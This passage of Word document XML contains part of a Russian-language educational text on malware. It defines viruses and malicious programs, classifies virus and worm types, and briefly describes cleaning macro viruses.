      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:t>с</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:t>ных инцидентов без использования антивирусного программного обеспечения.</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pStyle w:val="ad"/>
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="ad"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Определения компьютерного вируса - исторически проблемный вопрос, поскольку достаточно сложно дать четкое определение вируса, очертив при этом свойства, присущие только вирусам и не характерные для других пр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>грамм. Наоборот, давая жесткое определение вируса как программы, облада</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ю</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>щей определенными свойствами практически сразу же можно найти пример вируса, таковыми свойствами не обладающего.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="ad"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Приведем определение вируса согласно ГОСТ P 51198-98</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="210"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="29"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Вирус </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="28"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>- программа, способная создавать свои копии (необязательно со</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="28"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>в</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="28"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>падающие с оригиналом) и внедрять их в файлы, системные области компь</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="28"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ю</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="28"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>тера, компьютерных сетей, а также осуществлять иные деструктивные де</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="28"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>й</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="28"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ствия. При этом копии сохраняют способность дальнейшего распространения. Ко</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="28"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>м</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="28"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>пьютерный вирус относится к вредоносным программам</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="ad"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Еще одна проблема, связанная с определением компьютерного вируса кроется в том, что сегодня под вирусом чаще всего понимается не «традицио</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>н</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ный» вирус, а практически любая вредоносная программа. Это приводит к п</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>у</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>танице в терминологии, осложненной еще и тем, что сегодня практически л</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ю</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>бой антивирус способен выявлять все типы вредоносных программ, таким о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>б</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>разом ассоциация «вредоносная программа-вирус» становится все более усто</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>й</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>чивой.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="210"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="29"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Вредоносная программа </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="28"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>- компьютерная программа или переносной код, предназначенный для реализации угроз информации, хранящейся в ко</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="28"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>м</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="28"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>пьютерной системе (КС), либо для скрытого нецелевого использования ресу</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="28"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>р</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="28"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>сов КС, либо иного воздействия, препятствующего нормальному функционир</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="28"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="28"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ванию КС. К вредоносным программам относятся компьютерные вирусы, тр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="28"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="28"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>яны, сетевые черви и др.</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bookmarkStart w:id="136" w:name="bookmark5"/>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="43"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Вирусы</w:t>
      </w:r>
      <w:bookmarkEnd w:id="136"/>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="ad"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>К вирусам относятся:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="100"/>
        </w:numPr>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:ind w:left="809" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="aff1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> Загрузочные вирусы </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>- вирусы, заражающие загрузочные сектора постоянных и сменных носителей</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="100"/>
        </w:numPr>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:ind w:left="809" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="aff1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Файловые вирусы </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>- вирусы, заражающие файлы</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Макровирусы </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>- вирусы, написанные на языке макрокоманд и и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>с</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>полняемые в среде какого-либо приложения. В подавляющем большинстве случаев речь идет о макросах в документах</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Скрипт-вирусы </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>- вирусы, исполняемые в среде определенной к</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>мандной оболочки: раньше - bat- файлы в командной оболочке DOS, сейчас чаще VBS- и Java-скрипты в командной оболочке Windows Scripting Host (WSH)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="ad"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Отдельно стоит сказать о макровирусах. Большинство электронных д</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>кументов создаются и обрабатываются в формате MS Office, инструмент VBA (Visual Basic for Application), который можно использовать для создания макр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>вирусов поставляется вместе с приложением MS Office. Такое положение дел приводит к тому, что на сегодняшний день макровирусы - наиболее часто встречающийся тип вирусов. Однако борьба с ними не вызывает особых пр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>блем и сводится к изучению тела вредоносного макроса с помощью того же VBA на предмет выполняемых операций, контролю стартовых макросов AutoOpen, AutoClose, AutoSave, глобальных макросов FileOpen, FileSaveAs, FileSave, FileClose и ряда стандартных операций, таких как вызов API-функций, выполнения команд Shell и т. д. Процедура лечение макровирусов сводится к удалению тела макроса из документов и шаблонов MS Office.</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bookmarkStart w:id="137" w:name="bookmark6"/>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="420"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Сетевые черви</w:t>
      </w:r>
      <w:bookmarkEnd w:id="137"/>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="210"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="211"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Червь </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="2a"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="211"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>сетевой червь</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="2a"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>) - тип вредоносных программ, распространяющи</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="2a"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>х</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="2a"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ся по сетевым каналам, способных к автономному преодолению систем защиты автоматизированных и компьютерных систем, а также к созданию и дальне</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="2a"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>й</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="2a"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>шему распространению</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="210"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="2a"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>своих копий, не всегда совпадающих с оригиналом, осуществлению ин</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="2a"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="2a"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>го вредоносного воздействия</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="36"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="35"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>В зависимости от путей проникновения в операционную систему черви делятся на:</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Почтовые черви </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(Mail-Worm)- черви, распространяющиеся в формате сообщений электронной почты</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IM черви </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(IM-Worm) - черви, использующие Интернет-пейджеры</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P2P черви </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">(P2P-Worm) - черви, распространяющееся при </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>помощи пиринговых (peer-to-peer) файлообменных сетей</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Сетевые черви </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(Net-Worm) - прочие сетевые черви, среди которых имеет смысл дополнительно выделить Интернет-черви и LAN-черви</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:ind w:left="0" w:firstLine="709"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="1c"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Интернет черви </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>- черви, использующие для распространения пр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>токолы Интернет. Преимущественно этот тип червей распространяется с и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>с</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>пользованием неправильной обработки некоторыми приложениями базовых пакетов стека протоколов tcp/ip</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:ind w:left="0" w:firstLine="709"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="1c"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> LAN черви </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>- черви, распространяющиеся по протоколам локал</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ь</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="a3"/>
